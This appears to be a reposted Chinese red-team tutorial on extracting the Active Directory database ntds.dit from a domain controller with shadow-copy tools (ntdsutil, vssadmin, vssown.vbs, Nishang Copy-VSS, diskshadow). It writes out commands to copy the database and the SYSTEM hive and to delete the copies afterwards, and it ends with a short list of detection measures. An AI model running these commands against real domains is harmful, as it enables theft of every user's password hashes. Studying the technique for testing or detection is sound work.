windows 删除服务_使用卷影拷贝服务提取 ntds.dit 的多种姿势

最新推荐文章于 2024-03-20 09:52:34 发布
最新推荐文章于 2024-03-20 09:52:34 发布
阅读量321 收藏
点赞数
文章标签: windows 删除服务

渗透攻击红队

一个专注于红队攻击的公众号

dd41e8563a8e6e7c392e67df85275b09.png

大家好,这里是 渗透攻击红队 的第 32 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更

6bc16d809491c860e1e36d03c1ce426e.gifNtds.dit

Ntds.dit是主要的AD数据库,包括有关域用户,组和组成员身份的信息。它还包括域中所有用户的密码哈希值。为了进一步保护密码哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。

我们拿到Ntds.dit就能获取到域内所有用户的hash。

使用卷影拷贝服务提取 ntds.dit

简介

在通常情况下,即使拥有管理员权限,也无法读取域控制器中的 C:\Windows\NTDS\ntds.dit 文件(活动目录始终访问这个文件,所以文件被禁止读取)。

使用 Windows 本地卷影拷贝服务,就可以获得文件的副本(类似与虚拟机的快照)

使用卷影拷贝服务提取 ntds.dit

在活动目录中,所有的数据都保存在 ntds.dit 文件中。ntds.dit 是一个二进制文件,存储位置为域控制器的 %SystemRoot%\ntds\ntds.dit。

ntds.dit 中包含(但不限于)用户名、散列值、组、GPP、OU等与活动目录相关的信息。它和 SAM 文件一样,是被 Windows 操作系统锁定的。

通过 ntdsutil.exe 提取 ntds.dit

ntdsutil.exe 是一个为活动目录提供管理机制的命令行工具。使用 ntdsutil.exe,可以维护和管理活动目录数据库、控制单个主机操作、创建应用程序目录分区、删除由未使用活动目录安装向导(DCPromo.exe)成功降级的与控制器留下的元数据等。该工具默认安装在域控制器上,可以在域控制器上直接操作,也可以通过域内主机在域控制器上远程操作。

该工具支持的操作系统:

Windows Server 2003

Windows Server 2008

Windows Server 2012

工具使用方法:在域控制器的命令行环境下输入如下命令,创建一个快照,该快照包含Windows中的所有文件,且在复制文件时不会受到Windows锁定机制的限制。

ntdsutil snapshot "activate instance ntds" create quit quit

219c7432e395bed0c1cc912ec7c8c32b.png

可以看到,创建了一个 GUID 为 6a475b94-b066-448f-92b9-1a29b3fd2ef7 的快照。

接下来加载刚刚创建的快照。命令格式为:其中GUID就是刚刚创建快照的GUID

ntdsutil snapshot "mount {GUID}" quit quitntdsutil snapshot "mount {6a475b94-b066-448f-92b9-1a29b3fd2ef7}" quit quit

快照将被加载到 C:\$SNAP_202011091624_VOLUMEC$\ 目录下:

99055d59e4e86a85a2d5e474a5f3bc69.png

使用 Windows 自带的 copy 命令将快照中的文件复制出来:复制到C盘下

copy C:\$SNAP_202011091624_VOLUMEC$\windows\ntds\ntds.dit c:\ntds.dit

22e4d7bd1033b7d6d5f990bce8ca7f25.png

将之前加载的快照卸载并删除:

ntdsutil snapshot "unmount {GUID}" "delete {GUID}" quit quitntdsutil snapshot "unmount {6a475b94-b066-448f-92b9-1a29b3fd2ef7}" "delete {6a475b94-b066-448f-92b9-1a29b3fd2ef7}" quit quit

dcc37622410e018b7ca656f9ad53d3ac.png

其中,6a475b94-b066-448f-92b9-1a29b3fd2ef7 为创建快照的 GUID,每次创建快照的 GUID 都不同。

再次查询当前系统中的所有快照,显示没有任何快照,表示删除成功:

ntdsutil snapshot "List All" quit quit

be53ba7a5c71cb68adf0a918f9da9a28.png

利用 vssadmin 提取 ntds.dit

vssadmin 是 Windows Server 2008 及 Windows 7 提供的 VSS 管理工具,可用于创建和删除卷影拷贝、列出卷影的信息(只能管理系统 Provider 创建的卷影拷贝)、显示已安装的所有卷影拷贝写入程序(writers)和提供程序(providers),以及改变卷影拷贝的存储空间(即所谓的“diff空间”)的大小等。

在域控制器中打开命令行,输入命令,创建一个 C 盘的卷影拷贝:

vssadmin create shadow /for=c:

e62ae6d56bbb92ff2f4c08c26216db51.png

在创建的卷影拷贝中将 ntds.dit 复制出来:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\NTDS\ntds.dit c:\ntds.dit

0770db751f42b7f2fe3d4f051d6bb77f.png

此时即可在 C 盘中看到 ntds.dit 被复制出来了:

cecee2e4a88d23f8b26023e35b8e9eaa.png

执行如下命令,删除快照:

vssadmin delete shadows /for:c: /quiet

f782f3c129ee687a8ef9ba510ef9ff32.png

利用 vssown.vbs 脚本提取 ntds.dit

vssown.vbs 脚本的功能和 vssadmin 类似。可用于创建和删除卷影拷贝,以及启动和停止卷影拷贝服务。

下载地址:https://raw.githubusercontent.com/borigue/ptscripts/master/windows/vssown.vbs

可以在命令行环境下运行脚本:

#启动卷影拷贝服务cscript vssown.vbs /start#创建一个C盘的卷影拷贝cscript vssown.vbs /create c#列出当前卷影拷贝cscript vssown.vbs /list#复制ntds.ditcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\NTDS\ntds.dit c:\ntds.dit#删除卷影拷贝cscript vssown.vbs /delete ID

启动卷影拷贝服务:

cscript vssown.vbs /start

db3c391f8960d9b136950926046e5192.png

创建一个 C 盘的卷影拷贝:

cscript vssown.vbs /create c

17d18047ce82b69932f44e9c1600b651.png

列出当前卷影拷贝:

cscript vssown.vbs /list

dcc10f9af3fbc967c1c28b83cfb0e2a6.png

可以看到存在一个 ID 为 FE084F25-4F38-4C8B-B2D4-3538D5644D15 的卷影拷贝,存储位置为:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3。

复制 ntds.dit:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\windows\NTDS\ntds.dit c:\ntds.dit

4b47464136ef663fa5e74afe09212761.png

删除卷影拷贝:

cscript vssown.vbs /delete {FE084F25-4F38-4C8B-B2D4-3538D5644D15}

4c455f07747956a1c063b52b7913eeff.png

使用 ntdsutil 的 IFM 创建卷影拷贝

在使用 ntdsutil 创建 IFM 时,需要进行生成快照、加载、将 ntds.dit 和计算机的 SAM 文件复制到目标文件夹中等操作。

在域控制器以管理员模式打开命令行环境,输入命令:

ntdsutil "ac i ntds" "ifm" "create full c:/test" q q

3ad78ae7d7396028665d7a39644c6ba8.png

将 ntds.dit 复制到 c:\test\Active Directory\ 文件夹下:

dir "c:\test\Active Directory"

49a34d6b6aa162a534d558bf52409b8e.png

将 SYSTEN 和 SECURITY 两项复制到 c:\test\registry 文件夹下:

dir "c:\test\registry"

07decd36424e82d7b6aedf4be224a0bd.png

将 ntds.dit 拖回本地后,在目标机器上将 test 文件夹删除,命令如下:

rmdir /s/q test

9f42cf8875cf6c6f5254f7ad995dca7e.png

在 Nishang 中有一个 PowerShell 脚本 Copy-VSS.ps1。将该脚本提取出来,在域控制器中一个 powershell 窗口,导入执行脚本:

项目地址:https://github.com/samratashok/nishang

import-module .\Copy-VSS.ps1Copy-vss

cc6bd82dc89ef232f7a05966132b76b8.png

通过该脚本,可以将 SAM、SYSTEM,ntds.dit 复制到与ps1脚本相同的目录。

使用 diskshadow 导出 ntds.dit

查看帮助信息:

diskshadow.exe /?

88baceb4a825b4e3ef96b8f663451601.png

在渗透中可以使用 diskshadow.exe 来执行命令,例如将需要执行的命令exec c:\windows\system32\calc.exe写入C盘目录下的command.txt文件:

fd26dddf03136d7962d6a44d5a4772bc.png

echo exec c:\windows\system32\calc.exe>command.txt

da990f13673d0f2714020acfbaeb7aff.png

使用 diskshadow.exe 执行该文件中的命令:

diskshadow /s c:\command.txt

1068624147fd37cf187227936743b44d.png

diskshadow.exe 也可以用来导出 ntds.dit:

#将以下代码写入command.txtset context persistent nowritersadd volume c: alias someAliascreateexpose %someAlias% k:exec "cmd.exe" /c copy k:\Windows\NTDS\ntds.dit c:\ntds.ditdelete shadows alllist shadows allresetexit#加载文本(在C:\windows\system32 目录下执行,不然会出错)diskshadow /s c:\command.txt#转储 system.hivereg save hklm\system c:\windows\temp\system.hive

2fa5786eb66ecb19a58e2f32ce3b6362.png

system.hive中存放着ntds.dit的密钥,如果没有该密钥,将无法查看ntds.dit中的信息。

注意事项:

  • 在使用diskshadow.exe导出ntds.dit时,必须在C:\Windows\System32中进行操作。

  • 渗透测试人员可以在非特权用户权限下使用 diskshadow.exe 的部分功能。与其他工具相比,diskshadow的使用更为灵活。

  • 脚本执行后,要检查从快照中复制出来的 ntds.dit 文件大小。如果文件大小发生了改变,可以检查或修改脚本后重新执行。

监控卷影拷贝服务的使用情况

通过监控卷影拷贝服务的使用情况,可以及时发现攻击者在系统中进行的一些恶意操作。

  • 监控卷影拷贝服务及任何涉及活动目录数据库文件(ntds.dit)的可疑操作行为。

  • 监控 System Event ID 7036(卷影拷贝服务进行运行状态的标志)的可疑事例,以及创建 vssvc.exe 进程的事件。

  • 监控创建 diskshadow.exe 及相关子进程的事件。

  • 监控客户端设备中的 diskshadow.exe 实例创建事件。除非业务需要,在Windows操作系统中不应该出现 diskshadow.exe。如果发现,应立刻将其删除。

  • 通过日志监控新出现的逻辑驱动器映射事件。

参考文章:

https://xz.aliyun.com/t/2187

5f805497da6ee59161dcecdc11514122.png

渗透攻击红队

一个专注于渗透红队攻击的公众号

eecd3ee3ed49f6d3a1291fc0bf2e14af.png a59f25f3462330badeb3aaa1728e3f26.png点分享 bdd68e26adacbe81b292aaa4148a0895.png点点赞 9bc4cee59e484ffa0fbc0b9de5165478.png点在看
weixin_39929259
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用卷影拷贝服务提取ntds.dit
hongduilanjun的博客
07-21 757
在活动目录中,所有的数据都保存在ntds.dit中。ntds.dit是一个二进制文件,存储位置为域控制器的%SystemRoot%\ntds\ntds.ditntds.dit中包含用户名、散列值、组、GPP、OU等与活动目录相关的信息。它和SAM文件一样,是被操作系统锁定的。在一般情况下系统运维人员会利用卷影拷贝服务(volumeShadowCopyServer,VSS)实现ntds.dit拷贝,VSS本质上属快照(Snamshot)技术的一种,主要用于备份和恢复(即使目标文件被系统锁定)。...
win10系统卷影复制服务器,win10系统如何清理“系统还原和卷影复制”释放空间...
weixin_35599225的博客
08-06 617
当我们电脑使用时间久了之后,就会发现C盘有大量的空间被隐形占用了,这样就会占用磁盘空间从而运行系统运行速度,那么系统城小编要提醒大家,这个系统还原和卷影复制”功能的还原文件就占据了大量的磁盘空间,我们可以通过清理“系统还原和卷影复制”释放空间,接下来给大家分享一下win10系统清理“系统还原和卷影复制”释放空间吧。1、在“磁盘清理”工具扫描磁盘完毕显示的“***盘的磁盘清理”窗口中点击底部的“清理...
删除卷影复制副本,来找回你丢失的C盘空间
weixin_30545285的博客
08-04 583
我的系统是Windows Server 2008 R2。最近c盘空间巨减。转念一想,也许是用磁盘清理可以弄走不少垃圾呢,不过试了半天还是不管大用。windows server 2008 r2与windows 7不同,首先服务器版系统没有系统还原,平时使用的是windows server backup,所以没还原多少空间。 不过,减少你磁盘空间的也可能是在windows server 2008 r...
Windowsntds.dit提取Hash和域信息
子曰小玖的博客
04-30 932
在渗透测试进入内网之后,首要目标就是得到域控权限,将域中所有用户的hash值全部跑出来,下载到本地。很多工具比如meterpreter中的smart_hashdump和Impacket中的secretsdump.py都可以做到。 但是有些情况下我只能拷贝出来NTDS.dit文件,然后离线将这些密码提取出来。今天正好碰到了这一情况,接下来我将详细的介绍一下如何将密码导出,当然假设我已经成功将这两个...
内网渗透-windows获取(本地、域、Ntds.dit)登录凭证实战手法总结(超详细)
分享IT行业各种技术经验,从入门到入行,关注我学习更多知识。
02-03 1839
当获取一台域内主机权限时,接下来的渗透思路就是要获取更高权限的账号,用来访问域控或横向拓展,那么在获取本地用户、域用户凭证和获取域控Ntds.dit这一块就极其重要,将详细介绍红队渗透中使用获取登录凭证的手法。
Windows 服务器管理阶段测试题doc.docx
05-06
1. Windows 2003 域环境下的远程访问服务控制:为了设置用户“通过远程访问策略控制访问”,必须确保用户账户属于 RemoteUsers 组。因此,正确的解决方案是C. 把需要设置拨入属性的用户加入到 RemoteUsers 组。 2. ...
Windows2000中提升域控制器或将其降级为独立服务器.doc
06-29
反之,将域控制器降级为独立服务器,则是从该服务器上删除Active Directory服务,并切换回使用本地用户账户系统(User Account System, UAS)。这两种操作对于网络管理员来说都是非常重要的任务。 #### 提升域控制...
服务器构建指南纤细步骤.doc
最新发布
06-29
构建辅助服务是指在核心环境搭建完成后,进一步添加更多高级服务,如邮件服务、远程访问服务等。这一阶段的工作包括: - **消息传递服务**:配置邮件服务器,实现内部邮件通信。 - **协作服务**:部署协作平台,如...
Windows2003服务器30题[文].pdf
10-12
2. 轻型目录访问协议(LDAP):LDAP用于查询和修改Active Directory目录服务中的信息。对象名称的改变,如DN(Distinguished Name)或RDN(Relative Distinguished Name)可能会改变对象的位置,但不会改变其属性值。...
内网渗透--提取域控NTDS
qq_62169455的博客
09-24 743
NTDS.DIT:为DC的数据库,内容有域用户、域组、用户hash等信息,域控上的ntds.dit只有可以登录到域控上的用户(如域管用户、DC本地管理员用户)可以访问,为了进一步保护密码哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。位置:C:\Windows\NTDS该文件和SAM文件类似,是不能直接读取的,也不能复制。
《艾尔登法环》出现untrusted system file故障怎么解决
onecdll的博客
03-20 2058
在启动游戏时出现untrusted system file的报错主要是游戏的反作弊程序easy anti-cheat(简称EAC)的问题导致的。那么具体怎么解决呢?下面一起来看看吧!
Windows-删除Windows Server backup卷影备份
weixin_34150830的博客
01-30 1023
现有环境中有一台Windows Server做过定期备份计划,时间太久未做清理操作,收到磁盘报警邮件后需要及时释放该空间,具体操作步骤如下:当前备份计划信息如下:清理步骤如下:1.以管理身份运行CMD或者Powershell:2.在命令行模式下输入:diskshadow 进入diskshadow 模式DiskShadow.exe是一种公开卷影复制服务(VSS)提供的功能的工具...
【渗透笔记】域内密码凭证获取
白菜猪肉炖粉条
12-28 1688
Volume Shadow Copy 活动目录数据库 ntds.dit 活动目录数据库,包括有关域用户、组和组成员身份的信息。它还包括域中所有用户的密码哈希值。 为了保护密码哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。 因此想要破解sam文件和ntds.dit文件都需要拥有一个system文件 ntds.dit文件位置:%SystemRoot%\NTDS\NTDS.dit system文件位置:%SystemRoot%\System32\config\SYSTEM sa
关于windows设备 \Device\HarddiskVolume3及其故障报错处理。
热门推荐
玄风角落
06-30 4万+
近日电脑老是使用中卡死无响应,查看日志报错为磁盘故障,转储失败。看图 我们点开日志的详细信息,查看一下具体的故障设备: 通过查看日志详细信息,得知是 \Device\HarddiskVolume3 这个设备出了问题。通常我们对磁盘都是以磁盘盘符去查找的,这个\Device\HarddiskVolume3 改怎么解读呢?由于windowsxp之后,磁盘管理都是以卷(Volume)的...
Windows域内密码凭证获取 (゚益゚メ) 渗透测试
寻觅的博客
03-11 1549
文章目录域凭证介绍获取域内专属凭证(ntds.dit)卷影复制服务(Volume Shadow Copy Service (VSS)) 域凭证介绍 前提知识: Windows信息收集、渗透测试常用命令 (https://xunmi.blog.csdn.net/article/details/113782525) 获取Windows系统密码凭证: 了解Windows系统中是如何对密码进行加密的和常用获取常规Windows电脑中密码的手段! (https://xunmi.blog.csdn.net/articl
8、域渗透——获得域控服务器的NTDS.dit文件
Fly_鹏程万里
06-11 2860
0x00 前言在之前的文章《导出当前域内所有用户hash的技术整理》曾介绍过通过Volume Shadow Copy实现对ntds.dit文件的复制,可用来导出域内所有用户hash。本文将尝试做系统总结,总结多种不同的方法。0x01 简介本文将要介绍以下内容:多种实现方法比较优缺点0x02 通过Volume Shadow Copy获得域控服务NTDS.dit文件测试系统:Server 2008 ...
第6章域控制器安全
willow_liang的博客
12-28 1万+
目录 第6章域控制器安全 6.1使用卷影拷贝服务提取ntds.dit 6.1.1通过ntdsutil.exe提取ntds.dit 6.1.2 利用 vssadmin提取 ntds.dit 6.1.3利用vssown.vbs脚本提取ntds.dit 6.1.4使用ntdsutil的iFM创建卷影拷贝 6.1.5使用diskshadow导出ntds.dit 6.1.6 监控卷影拷贝服务使用情况 6.2导出ntds.dit中的散列值 6.2.1使用 esedbexport恢复ntds..
windows 文件系统
午夜安全
07-05 8873
1.什么是文件系统文件系统是操作系统用于明确存储设备(磁盘、固态硬盘)上组织文件的方法。从系统角度来看,文件系统是对文件存储设备的空间进行组织和分配,负责文件存储并对存入的文件进行保护和检索的系统。FAT32分区格式采用32位的文件分配表,使其对磁盘的管理能力大大增强,突破了FAT16对每一个分区的容量只有2GB的限制。但是由于FAT32分区存在无法存放大于4GB的单个文件,性能不佳,易产生磁盘碎...
怎么解析NTDS.dit
04-27
NTDS.ditWindows操作系统中Active Directory数据库文件的一部分。要解析NTDS.dit文件,可以使用工具如dsdbutil、ntdsutil和esentutl等。这些工具可以帮助管理员执行各种操作,例如备份和还原数据库、重建索引、检查数据库状态等。此外,可以使用一些第三方工具进行NTDS.dit文件的解析,例如Active Directory解析器和LDP工具等。这些工具可以让管理员更方便地查看和管理Active Directory数据库文件。请注意,解析NTDS.dit文件需要具备一定的技术知识和经验,并且需要谨慎执行相关操作,以避免意外损坏数据库文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值